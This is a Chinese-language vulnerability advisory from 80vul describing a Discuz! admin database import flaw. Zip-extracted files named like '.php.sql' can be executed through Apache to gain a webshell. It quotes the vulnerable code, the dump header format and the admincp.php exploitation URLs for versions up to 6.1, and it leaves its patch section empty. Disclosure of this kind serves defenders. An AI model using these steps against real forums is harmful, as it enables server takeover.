Discuz! admin\database.inc.php get-webshell bug author: ring04h team:http://www.80vul.com [该漏洞由ring04h发现并且投递,thx] 由于Discuz!的admin\database.inc.php里action=importzip解压zip文件时,导致可以得到webshell. 一 分析 在文件admin\database.inc.php里代码: ..... elseif($operation == 'importzip') { require_once DISCUZ_ROOT.'admin/zip.func.php'; $unzip = new SimpleUnzip(); $unzip->ReadFile($datafile_server); if($unzip->Count() == 0 || $unzip->GetError(0) != 0 || !preg_match("/\.sql$/i", $importfile = $unzip->GetName(0))) { cpmsg('database_import_file_illegal', '', 'error'); } $identify = explode(',', base64_decode(preg_replace("/^# Identify:\s*(\w+).*/s", "\\1", substr($unzip->GetData(0), 0, 256)))); $confirm = !empty($confirm) ? 1 : 0; if(!$confirm && $identify[1] != $version) { cpmsg('database_import_confirm', 'admincp.php?action=database&operation=importzip&datafile_server=$datafile_server&importsubmit=yes&confirm=yes', 'form'); } $sqlfilecount = 0; foreach($unzip->Entries as $entry) { if(preg_match("/\.sql$/i", $entry->Name)) { $fp = fopen('./forumdata/'.$backupdir.'/'.$entry->Name, 'w'); fwrite($fp, $entry->Data); fclose($fp); $sqlfilecount++; } } ...... 注意2点 1. preg_match("/\.sql$/i", $importfile = $unzip->GetName(0)) 可以利用apache的特性如081127_k4pFUs3C-1.php.sql这样类似的文件. 2. $identify = explode(',', base64_decode(preg_replace("/^# Identify:\s*(\w+).*/s", "\\1", substr($unzip->GetData(0), 0, 256)))); 所以要注意文件格式:[可以先备用下然后修改打包为zip] # Identify: MTIyNzc1NzEyNSw2LjEuMCxkaXNjdXosbXVsdGl2b2wsMQ== # # # Discuz! Multi-Volume Data Dump Vol.1 # Version: Discuz! 6.1.0 # Time: 2008-11-27 11:38 # Type: discuz # Table Prefix: cdb_ 二 利用 提交: <6.0 :admincp.php?action=importzip&datafile_server=./附件路径/附件名.zip&importsubmit=yes =6.1 :admincp.php?action=database&operation=importzip&datafile_server=./附件路径/附件名称.zip&importsubmit=yes&frames=yes 三 补丁[fix] 缺